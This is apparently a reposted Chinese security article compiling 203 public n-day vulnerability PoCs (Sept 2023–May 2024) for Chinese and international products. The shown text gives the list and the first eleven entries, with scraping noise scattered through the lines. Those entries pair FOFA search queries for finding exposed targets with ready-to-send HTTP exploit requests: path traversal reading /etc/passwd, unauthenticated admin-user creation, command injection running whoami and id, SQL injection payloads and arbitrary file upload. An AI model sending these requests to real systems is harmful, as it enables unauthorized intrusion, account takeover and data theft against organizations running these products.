互联网公开漏洞整理202309-202406 c4 p* N& \6 p$ F* t1 Z
道一安全 2024-06-05 07:41 北京8 B0 R; }. J- w, T
以下文章来源于网络安全新视界 ,作者网络安全新视界! H F2 o# r, m8 B& F5 I* L. J
. [" T: y" B# o; P# R8 [
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
. R( C% F7 _0 Q0 L& k: ]7 ~6 f \! ^4 A1 N
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。1 ^) R z: ^3 i+ G7 g4 T( S
& M( a$ L' I, N+ e( d7 f安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。9 d/ W0 u! ^/ p( f8 S" v% a
3 n/ C$ _0 S' m5 R+ H8 f) C. {
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
+ L3 ^* n! U( O" A
7 M: r. e2 ^* O8 ?合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。/ g( y& m1 Y1 v! \5 G1 d2 {
2 s9 b, v4 [! g/ H9 z$ l8 {; W8 v3 E0 q+ v1 \- b) u* G
声明: a% \6 H* g: l+ X9 U0 {
( T% p8 n4 o: \
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
5 t7 U, E# n$ a% \1 i9 K+ F' s* J# v1 z8 R6 c
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
1 s% j6 W( W7 q6 Q+ N
# N: {# Y$ ]6 F, U5 ?$ x4 E5 b: K! `) V2 g6 `0 n2 {+ f' X
- ^6 [+ u a* ^' O
目录
0 N, g' t. X! p9 X. @6 ^) k# ?6 U
: F! W3 i& ^6 @- T/ x5 M) b! n/ b01# H x+ R* `$ T* q/ h. w, b4 x
* p5 p$ A5 ]0 X+ V$ K1. StarRocks MPP数据库未授权访问
# r9 F) m+ t. A$ w( \2. Casdoor系统static任意文件读取
9 Y( U" z8 f+ H0 K+ X1 A& D3. EasyCVR智能边缘网关 userlist 信息泄漏% ~6 }: x& C. h5 A# d
4. EasyCVR视频管理平台存在任意用户添加
) l3 n5 F( l5 Y8 F" Z9 e5. NUUO NVR 视频存储管理设备远程命令执行1 M& T8 S2 s& v: k, J; V) q
6. 深信服 NGAF 任意文件读取
. P* L$ s0 J+ R& A2 @7. 鸿运主动安全监控云平台任意文件下载7 n8 T3 |4 V( {) s- ~
8. 斐讯 Phicomm 路由器RCE
# I2 {* Q& z, f; f# q9 ?9. 稻壳CMS keyword 未授权SQL注入
, K" b# T9 q3 }2 J0 ?# m0 N10. 蓝凌EIS智慧协同平台api.aspx任意文件上传7 f" _7 {1 a& l( b- b: r& U
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
! W0 X5 r2 _- c2 s- v12. Jorani < 1.0.2 远程命令执行
! U4 X' v1 t6 d) a/ t13. 红帆iOffice ioFileDown任意文件读取
0 `* u. B6 a3 `3 r14. 华夏ERP(jshERP)敏感信息泄露4 ]9 B: k4 W# D, k6 K0 N0 M
15. 华夏ERP getAllList信息泄露
" c; T/ N; {# W- w7 j16. 红帆HFOffice医微云SQL注入$ z8 ^" j* W% I# h4 G0 E
17. 大华 DSS itcBulletin SQL 注入
) T) v; D1 ?& k; T! S- K18. 大华 DSS 数字监控系统 user_edit.action 信息泄露0 ^: t( j& @* _$ T6 g
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入. G7 m- z! }) G) Z2 l) u% H
20. 大华ICC智能物联综合管理平台任意文件读取
# y& q6 v+ m2 L21. 大华ICC智能物联综合管理平台random远程代码执行+ g/ }) E6 @7 O
22. 大华ICC智能物联综合管理平台 log4j远程代码执行" H7 t0 E7 ?- L: _
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
" g' d8 G* q1 ^2 a) K24. 用友NC 6.5 accept.jsp任意文件上传
: ^$ b+ r( N* g9 Z3 _, P0 m25. 用友NC registerServlet JNDI 远程代码执行3 a( I. o% F; ?
26. 用友NC linkVoucher SQL注入
% d" s/ {7 T4 H/ p0 f27. 用友 NC showcontent SQL注入9 J3 ~9 Q- S5 N, u
28. 用友NC grouptemplet 任意文件上传
9 _% k* X4 K1 |; T s' U29. 用友NC down/bill SQL注入* D: {7 a/ f' \" C8 i/ X7 Y7 {9 t
30. 用友NC importPml SQL注入; D3 S/ r5 K' _% J
31. 用友NC runStateServlet SQL注入. b6 b& ^+ l6 W' d# I
32. 用友NC complainbilldetail SQL注入, |7 T2 K( ^! |* z3 l; }
33. 用友NC downTax/download SQL注入/ d; O% [! i$ u2 _) z# p
34. 用友NC warningDetailInfo接口SQL注入
/ ^4 Q7 ^+ F" C; C8 i5 N! T2 m35. 用友NC-Cloud importhttpscer任意文件上传
. g, ?& R, H9 w; c4 v! P7 a$ T4 ^: F36. 用友NC-Cloud soapFormat XXE
9 [, n8 P! @8 H0 P! l7 E37. 用友NC-Cloud IUpdateService XXE
b3 V4 Q$ m# v, ~7 m/ i3 m38. 用友U8 Cloud smartweb2.RPC.d XXE4 r: e( j5 Z m$ A
39. 用友U8 Cloud RegisterServlet SQL注入
$ t/ t6 w$ F8 m& {3 r40. 用友U8-Cloud XChangeServlet XXE
" H7 P. T" K1 o) D/ L41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 x1 b# w; ?/ x; g5 s: ] _% T- k4 b7 F42. 用友GRP-U8 SmartUpload01 文件上传
8 t8 L! Y) r5 R4 V43. 用友GRP-U8 userInfoWeb SQL注入致RCE* \& m: n; X! h% f
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
; T9 m# j7 A$ `% Q45. 用友GRP-U8 ufgovbank XXE
2 g( W3 e4 u. n/ W/ x) z4 |46. 用友GRP-U8 sqcxIndex.jsp SQL注入
) C" _9 N1 k. w \. `4 H- G47. 用友GRP A++Cloud 政府财务云 任意文件读取# F }2 t8 Z+ k$ v F0 }! t0 |
48. 用友U8 CRM swfupload 任意文件上传
8 [/ L7 Y: e# g T49. 用友U8 CRM系统uploadfile.php接口任意文件上传) I- J! F! V3 @
50. QDocs Smart School 6.4.1 filterRecords SQL注入) W9 F6 W2 V/ p' J. ]) U: K. ~+ ?
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
2 w6 R+ q2 Q$ T' J$ }5 k52. 泛微E-Office json_common.php sql注入9 w" q- H$ a3 t( {- r. U
53. 迪普 DPTech VPN Service 任意文件上传* A( ]4 h/ N: C, @: y/ `
54. 畅捷通T+ getstorewarehousebystore 远程代码执行0 ^) j1 |8 s' ~+ @- ~, h
55. 畅捷通T+ getdecallusers信息泄露
! G; r/ Z! }# C( K2 ]: S! m) X56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE; G* N& h/ _6 i C `
57. 畅捷通T+ keyEdit.aspx SQL注入
. u! u, C" s. c# O( s8 _7 S1 @) e, J58. 畅捷通T+ KeyInfoList.aspx sql注入
, K- Z/ {, A' R8 E" }! W59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行- ^ q0 k5 ~, i, B
60. 百卓Smart管理平台 importexport.php SQL注入
) Z* u. A) Y: ~4 }* t61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
7 g0 i( |# P) H* K8 z9 d- _62. IP-guard WebServer 远程命令执行! V: N3 f% g! u( B* ?
63. IP-guard WebServer任意文件读取3 |; v8 r4 [' u2 b4 E
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
( b6 a4 X1 B2 K5 e/ J! J65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过) |0 ]4 b& ~3 X2 `3 H; m
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
; ^( c4 W& r* l# D67. 万户ezOFFICE wpsservlet任意文件上传) |/ i; O) y. \8 \9 q f
68. 万户ezOFFICE wf_printnum.jsp SQL注入
2 V6 q; H1 H! U6 G69. 万户 ezOFFICE contract_gd.jsp SQL注入6 y4 M* V6 I X- `! l, s
70. 万户ezEIP success 命令执行+ K- `- ?. d+ i) O
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
- b7 n9 \3 t3 R) v1 S' O# M72. 致远OA getAjaxDataServlet XXE- Z5 ]5 z- U5 B: t! c$ t( H
73. GeoServer wms远程代码执行
: `- ~% H9 _, E' M* ?+ v74. 致远M3-server 6_1sp1 反序列化RCE
. Q1 o" _( d. v* J4 k3 y3 k75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
- ~# {+ f+ |: G# ~" u76. 新开普掌上校园服务管理平台service.action远程命令执行4 w, a2 z4 v# q! X& ] T$ q
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
% m: n, r/ J1 L F78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
# I, K0 t c; d79. BYTEVALUE 百为流控路由器远程命令执行
3 G( s# O, F4 _6 Y4 S80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传" ^. ~& s- m2 [
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
1 V- D" r- e- t, J82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
4 F O7 e1 \) M/ z( W2 k7 w, \83. JeecgBoot testConnection 远程命令执行: ^$ ^, L1 Q/ W5 N
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入9 f$ Y' y$ Y5 B7 X o
85. SysAid On-premise< 23.3.36远程代码执行
! R$ y9 J3 m& ?( g/ z# n86. 日本tosei自助洗衣机RCE
6 i z: @5 ^; _8 k87. 安恒明御安全网关aaa_local_web_preview文件上传4 ^ N# ]+ u% @
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
c9 U. g* r) H89. 致远互联FE协作办公平台editflow_manager存在sql注入
# H u: S) \7 }; }" _ [90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
T5 d; v" o* U) r& ?' ]91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取9 \, T7 J( x* G8 g
92. 海康威视运行管理中心session命令执行
+ S4 G8 p/ u' ?; u93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传% p. w- T5 Q. U S$ o$ X+ K
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传* [- v* ~6 h# O9 Y" ]2 P% m
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
. X8 e/ Z* Z& K* C" V) v96. Apache OFBiz 18.12.11 groovy 远程代码执行
( x! U4 O( K1 k97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
8 ~. ?% E- K b$ u98. SpiderFlow爬虫平台远程命令执行' e6 p* V/ G6 B/ K# N3 `$ Y9 D
99. Ncast盈可视高清智能录播系统busiFacade RCE- W$ v7 Z4 n" u# y! x3 }0 S
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传: h6 c0 H) j A, j# ~! h
101. ivanti policy secure-22.6命令注入
8 F3 u: O% \) ?1 ^! J102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
) Y2 a$ k& t4 d103. Ivanti Pulse Connect Secure VPN XXE2 M: P$ Z/ S! l8 P
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露! o8 ]5 v y! o- c6 Z) f
105. SpringBlade v3.2.0 export-user SQL 注入5 T d* u! h! }/ c9 n6 Q6 l6 e
106. SpringBlade dict-biz/list SQL 注入
8 f7 |2 g7 J4 q7 b107. SpringBlade tenant/list SQL 注入! u; z) _) t% {; L0 P3 A+ n+ R
108. D-Tale 3.9.0 SSRF
; Y, D3 y. ~9 {3 l" D109. Jenkins CLI 任意文件读取
5 ~( j/ L8 p3 g6 z/ v0 X4 k110. Goanywhere MFT 未授权创建管理员- c U9 ^/ j9 q3 K, a
111. WordPress Plugin HTML5 Video Player SQL注入: x! D6 M* w: l |+ ^5 C4 Q
112. WordPress Plugin NotificationX SQL 注入: b) d9 z; _/ Y- [ E8 N
113. WordPress Automatic 插件任意文件下载和SSRF
# s' H8 X D9 b3 O% Z6 |114. WordPress MasterStudy LMS插件 SQL注入
% S2 n2 O0 Y; @ D( y* O115. WordPress Bricks Builder <= 1.9.6 RCE
( [0 S7 I. D4 ~7 j7 _- M1 ~116. wordpress js-support-ticket文件上传& ?# |% P* `( _! |+ f! i
117. WordPress LayerSlider插件SQL注入' U( b/ b+ B9 D" b
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
% n8 U/ e' {7 b* \& i/ d119. 北京百绰智能S20后台sysmanageajax.php sql注入
x' |3 ^. m" ~$ y120. 北京百绰智能S40管理平台导入web.php任意文件上传4 B7 v* Q" V/ b# \
121. 北京百绰智能S42管理平台userattestation.php任意文件上传4 I7 k7 Y3 l4 f4 N* c2 \
122. 北京百绰智能s200管理平台/importexport.php sql注入# P8 K; w* C! p$ G5 M! x7 ^+ E2 J
123. Atlassian Confluence 模板注入代码执行
* j9 R# i4 B/ p( z( b/ Q124. 湖南建研工程质量检测系统任意文件上传! A V) f- D t) \ B. k
125. ConnectWise ScreenConnect身份验证绕过
+ U3 E- m J; K/ ?126. Aiohttp 路径遍历
3 D6 z/ ^" \, K9 J! M$ Z127. 广联达Linkworks DataExchange.ashx XXE
$ F- z, ]6 C' j- E128. Adobe ColdFusion 反序列化" V9 i; s9 i- e. X! O/ Y8 d/ M1 e
129. Adobe ColdFusion 任意文件读取% N- w: V7 A U8 d2 s
130. Laykefu客服系统任意文件上传
: R: `' l% s7 O# ~$ q& F8 b# K& I! y) g131. Mini-Tmall <=20231017 SQL注入- b' W! H5 Y% l
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
" X" f0 T' W2 J133. H5 云商城 file.php 文件上传9 l% A) J) F' ^5 J
134. 网康NS-ASG应用安全网关index.php sql注入
9 T, J n6 J4 H3 ^. {: g' A1 K135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
0 b& ~, v( Q% J: k# A# O136. NextChat cors SSRF
3 Z# ~# z3 W9 z1 k137. 福建科立迅通信指挥调度平台down_file.php sql注入! _8 C' S5 Z+ f" O9 A
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
' w3 J& F0 U% Q k139. 福建科立讯通信指挥调度平台editemedia.php sql注入: o: ?& V1 A7 C* x1 h0 }% _
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
' ]8 U! P6 ~* U8 P. E# `141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入/ _& D% ]' y5 `) K- ^
142. CMSV6车辆监控平台系统中存在弱密码' t: a! } G: Q E; t/ M
143. Netis WF2780 v2.1.40144 远程命令执行
' W% p4 F' X& j- _: _144. D-Link nas_sharing.cgi 命令注入( b& o$ K" q9 |) {; l$ _
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
" W* e- M% |& _, V& a146. MajorDoMo thumb.php 未授权远程代码执行
1 l2 L3 O" B8 N' D$ i! f147. RaidenMAILD邮件服务器v.4.9.4-路径遍历0 u4 O/ a6 _& [5 w
148. CrushFTP 认证绕过模板注入
+ J. e; I% r# s3 y149. AJ-Report开源数据大屏存在远程命令执行- G% H" w( h, X0 [ G" ?
150. AJ-Report 1.4.0 认证绕过与远程代码执行% M* _$ N4 p/ z Z: a
151. AJ-Report 1.4.1 pageList sql注入
9 x G3 f1 s4 i4 \+ t" P152. Progress Kemp LoadMaster 远程命令执行- N; [3 Y/ E2 P* V
153. gradio任意文件读取
8 N. y! b$ k. W* a9 M. l& k6 _/ r154. 天维尔消防救援作战调度平台 SQL注入
7 w6 ~- T; c+ p3 t8 x7 T7 r( c ?6 e155. 六零导航页 file.php 任意文件上传! @7 `0 z- V: O
156. TBK DVR-4104/DVR-4216 操作系统命令注入
" s% Q% p; o; n& W% f+ A157. 美特CRM upload.jsp 任意文件上传/ e! p3 ? U+ `7 n) g4 m
158. Mura-CMS-processAsyncObject存在SQL注入, ]' }. g. f8 d8 d k
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传( \4 U ^& w8 N" O/ v
160. Sonatype Nexus Repository 3目录遍历与文件读取
$ ]: g& Q5 G9 n0 U# u161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传+ y4 D0 n: n# f; ?* ~8 F
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传$ y+ y1 b2 f- }& E
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传/ |: k5 c( ?, l! S- g7 w) w9 R9 C
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
8 I- O1 v( d0 L: S# I2 Y$ N0 y165. OrangeHRM 3.3.3 SQL 注入; P# ^8 g W# d4 I; R
166. 中成科信票务管理平台SeatMapHandler SQL注入
# M6 E \4 f0 d. {: h& }167. 精益价值管理系统 DownLoad.aspx任意文件读取$ s$ O, Z' R; k; Q: I
168. 宏景EHR OutputCode 任意文件读取4 _+ w2 L, w3 I
169. 宏景EHR downlawbase SQL注入
. W$ C( R5 e- a0 ^: M+ `2 X% `170. 宏景EHR DisplayExcelCustomReport 任意文件读取
/ l, e& a1 ?& u) H6 |& `171. 通天星CMSV6车载定位监控平台 SQL注入1 ^7 O7 Z) A7 u
172. DT-高清车牌识别摄像机任意文件读取
" a, m+ `3 F$ t+ ~3 r; J173. Check Point 安全网关任意文件读取
8 D0 C9 k3 u7 e/ H* ]174. 金和OA C6 FileDownLoad.aspx 任意文件读取
6 B9 D% i( g; p& x2 \% w8 t175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
0 h4 T( ]& a f9 K3 z7 D$ ]176. 电信网关配置管理系统 rewrite.php 文件上传/ \5 D$ ^( c1 s/ M. F. m+ p
177. H3C路由器敏感信息泄露+ V+ _+ B A6 w8 u4 F1 ~5 u7 r2 }
178. H3C校园网自助服务系统-flexfileupload-任意文件上传, l* L0 D9 b' W B3 c6 y% C1 q
179. 建文工程管理系统存在任意文件读取
! @* L2 R% Q& z180. 帮管客 CRM jiliyu SQL注入
( N8 y% S- H+ j% d' F181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
; H6 z. X" r3 ]3 {0 A8 a5 i182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建% w) W8 j) i6 x
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
/ M, I z. G, N; K* }* h/ }184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
% r {0 M: R! ]! ~185. 瑞友天翼应用虚拟化系统SQL注入
! V' p9 G1 G8 q+ C( ]186. F-logic DataCube3 SQL注入0 t4 w- [2 N$ E, b, j4 \
187. Mura CMS processAsyncObject SQL注入 F: j/ c3 n: `, e& q' U
188. 叁体-佳会视频会议 attachment 任意文件读取" U5 K Z# m8 |, w Q
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
% Y+ _1 K( v$ }& p/ _. h6 O( W190. 短视频矩阵营销系统 poihuoqu 任意文件读取! ]* E) A6 Y3 p# n9 ~ G
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入/ d4 D# F; G4 n, A/ I' K
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传& C6 S2 C3 n* U2 e" G' E- R$ x1 I8 I
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行1 m9 s2 f8 v. | @" n! K* L2 {
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传7 s, P0 _" d/ M3 I( s: w! U6 L
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
# B% _5 c, Q. l196. 河南省风速科技统一认证平台密码重置
$ u& G" z7 P. D$ j, c9 d: @; n3 ^197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入7 `) c. \, N4 a0 s2 v+ v% I
198. 阿里云盘 WebDAV 命令注入
1 G) K$ U0 t) {& J' C |199. cockpit系统assetsmanager_upload接口 文件上传9 {6 z1 s" h- e; U) Q5 P, a
200. SeaCMS海洋影视管理系统dmku SQL注入
3 G1 C! |. B& ^1 b( A7 I201. 方正全媒体新闻采编系统 binary SQL注入
0 Y2 L: n# ^5 R202. 微擎系统 AccountEdit任意文件上传& `! k1 D$ k( s6 Y, ~$ U
203. 红海云EHR PtFjk 文件上传
# J: G* l. n! u) z2 P# a. J: g
$ d2 |% E0 y: d. {6 gPOC列表+ E' l4 A3 y: X6 v6 V1 ^
3 A9 S9 s% Q- u2 V% g
028 f) O" m8 q% X6 j6 o
; J. v: |6 l! @5 H6 o! {; D1 E
1. StarRocks MPP数据库未授权访问0 L c9 f3 f: S4 A: |9 ?
FOFA :title="StarRocks"
6 w6 w/ A! J0 y& gGET /mem_tracker HTTP/1.1& Q# U6 w1 T7 ~1 X3 X+ q/ ^
Host: URL
3 `+ T4 ]' h1 Y" [7 J7 B; T5 N% b! f6 g
4 Z) Y, u9 o* }1 X0 f2 [' L! d# H2. Casdoor系统static任意文件读取
; [0 G1 w6 R" v6 zFOFA :title="Casdoor"
! F% M T& d4 l8 k2 DGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1% h1 U4 S8 C. x. \6 y
Host: xx.xx.xx.xx:9999
! D% d. l3 l) I2 q3 z! ?4 KUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 h; S) T* C/ e* Y. lConnection: close5 I4 ^: X6 V1 i
Accept: */*) f4 y$ V* z$ o2 f4 C
Accept-Language: en$ F4 \/ n8 z! j: v* u+ i9 g" r
Accept-Encoding: gzip
5 V5 D: R$ M# d: s6 R
( W. Q, l& v' J, a6 ]7 {5 n1 K
4 x% I R6 [8 j, M! a3. EasyCVR智能边缘网关 userlist 信息泄漏8 Z Q6 A# ], E G$ E
FOFA :title="EasyCVR"
8 n) y1 o3 V# f1 @) B# xGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
! L( f/ H6 I4 l1 K6 j `Host: xx.xx.xx.xx4 V8 n: a) P, s( f, [; T( c
9 A9 q* u A+ [' _' u2 r
& J% f# b3 f/ ^5 z! s) o k! l& H: N0 B4. EasyCVR视频管理平台存在任意用户添加+ Y, x* k Y0 w* Q! W
FOFA :title="EasyCVR"
y; J! Z% ~' V8 g2 E( |9 t( a$ i4 K5 j6 ]. P7 @
password更改为自己的密码md5; B+ ]' F3 ~5 d0 w
POST /api/v1/adduser HTTP/1.1
# y) G$ N; v# j2 ~Host: your-ip" \7 u) U4 m/ W; d( P
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
: _8 m$ j( N7 H+ K" e4 k( _$ c0 O1 z& L& E: }% K% G! d9 r) P
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
! C6 k3 J, p8 k- r" B+ e- ^( [3 R2 X* q% u" y
2 G0 q( Y5 d% j% N$ D7 ?' w. @9 N. F5. NUUO NVR 视频存储管理设备远程命令执行
$ |3 t( L0 V) o- C" P6 uFOFA:title="Network Video Recorder Login"1 @) h+ f' D- w1 d+ r: O
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1 W( C3 ]' P) F; |
Host: xx.xx.xx.xx
8 x' ^% e! _( j. ~# j4 Z8 u9 K
3 t J) c" ]3 \0 q' i5 T- ^
5 c+ ^& y4 d+ B6. 深信服 NGAF 任意文件读取
. u; h% a/ ]: S3 C7 a4 L) nFOFA:title="SANGFOR | NGAF"
% {: p0 v) f( M! ^6 O9 T# R$ jGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
8 @0 i ?: {# T: ]6 ]% Z, uHost:
# }! G( c, R1 ]' }+ S; S) G+ e) ^
1 M( Y/ z: L# L! ^% j$ m; q6 [4 e
7. 鸿运主动安全监控云平台任意文件下载
: j5 v5 [2 v5 f+ v9 L# } gFOFA:body="./open/webApi.html"* y1 t, K. B: i* k9 A$ z
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
% i. q& v; L2 K9 b0 WHost:
* d! r# H0 S5 [ o- [0 B) w% E/ a
2 ^: g: A$ } z" a
& _: w/ |0 R0 \( h; l; l* @8. 斐讯 Phicomm 路由器RCE# O" J7 W$ F0 G0 }, d% m
FOFA:icon_hash="-1344736688"
( U+ i; i: {4 o默认账号admin登录后台后,执行操作: T, S2 {) L( C2 `0 M
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1* g" ~- P0 b. }9 Q
Host: x.x.x.x
' H3 Z9 O* q6 | G2 SCookie: sysauth=第一步登录获取的cookie
- @" S+ s( s3 C# [; h4 e: pContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz6 \# [3 e9 b# x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36; O, f" \; l6 m1 e" U
* G/ I, y2 F' _- J) x) Q------WebKitFormBoundaryxbgjoytz
) L% E& e$ W; h- n$ J! U% NContent-Disposition: form-data; name="wifiRebootEnablestatus"
7 C, J- C5 H( C R" ~- X
" o+ A* [3 |7 K1 L# Y%s
) y) O3 t( W6 j* c# ^, {------WebKitFormBoundaryxbgjoytz9 s+ |8 E' b3 z
Content-Disposition: form-data; name="wifiRebootrange"$ D& G2 W( V) C3 W1 ?
; @9 P- Z4 _6 O* K12:00; id;
' ~" l$ k. `3 x+ z8 p* @" B------WebKitFormBoundaryxbgjoytz* x9 C1 n9 z% Q# W8 t
Content-Disposition: form-data; name="wifiRebootendrange"
* J: L: |: u& i( W; V) N0 A$ d' |8 t- \5 u
%s:
4 `6 Q9 X9 P- Q8 n------WebKitFormBoundaryxbgjoytz9 K2 s# {) O" O9 g
Content-Disposition: form-data; name="cururl2"
, ^& A- x9 X. f( `8 g
& I5 J, ^& s# S' `: l
: b/ m( S" q9 u( }( n2 [; L9 Y------WebKitFormBoundaryxbgjoytz--' u' t/ P. Y( c( C% j
* e6 o6 ? S, ?
: h6 B& a+ b: e- q$ g9 n6 Z7 i
9. 稻壳CMS keyword 未授权SQL注入6 E. q5 A, p/ [' F8 _8 q" P
FOFA:app="Doccms"
% c# ?. _' `/ |' WGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
A j6 w# x; T* X/ E! p) @4 O% sHost: x.x.x.x
/ G' @4 p8 m' R' [. u* U! Y) F, {2 y. k& b& ?& C. c
7 _2 |" ]9 w+ c3 I. ]- c' d4 [
payload为下列语句的二次Url编码2 O0 U) S$ R9 R: T8 t E: s. o/ s
: s' x: ]. V- {2 M% U/ C' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
& j% I9 F$ U$ `+ D; g6 c: N' U1 E. ?/ t& e
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传" @( I* }0 U# @7 ?! n+ M5 v. h8 f
FOFA:icon_hash="953405444"2 Z' c y( ~& C5 G9 L
& {, ^" C5 H6 a, y- X6 Y
文件上传后响应中包含上传文件的路径
0 ~( m u) Q9 k: w5 ePOST /eis/service/api.aspx?action=saveImg HTTP/1.1( k+ d( g" l& ^& ?. ~, c: z9 W
Host: x.x.x.x:xx
0 v: l6 M: _( I4 b5 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
9 q; z3 z3 R6 UContent-Length: 197
- X2 L% j' ^$ `, _4 j3 u* i. pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9/ x% _. L6 `6 g' h3 r
Accept-Encoding: gzip, deflate
2 Z/ v& ^. Q2 Y [7 W9 |- n4 IAccept-Language: zh-CN,zh;q=0.9
. u! e; ^7 @3 `) J7 u4 e2 {! q% @# Y+ oConnection: close
7 m4 ~# w, d) ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
]1 J* C5 n" ~4 r% o% ?, A) @: q$ \$ P
------WebKitFormBoundaryxdgaqmqu
8 g+ X: T3 _; T, e: C, M3 MContent-Disposition: form-data; name="file"filename="icfitnya.txt"- L) D% z! R) k* H& D
Content-Type: text/html
7 \( C( b% Y$ G4 f: k& I2 w, a4 |' ^
jmnqjfdsupxgfidopeixbgsxbf
4 i% E6 l1 ~1 O5 h6 B3 E------WebKitFormBoundaryxdgaqmqu--
4 z% m3 K+ M3 J/ z' c1 ~ Y, _/ t. s0 e3 k
$ j& u3 Y W4 [5 N/ [, L$ q11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
- Q4 Z% S! z2 O. K2 `FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
7 g! n4 Y9 L! s6 K8 K# J9 IGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
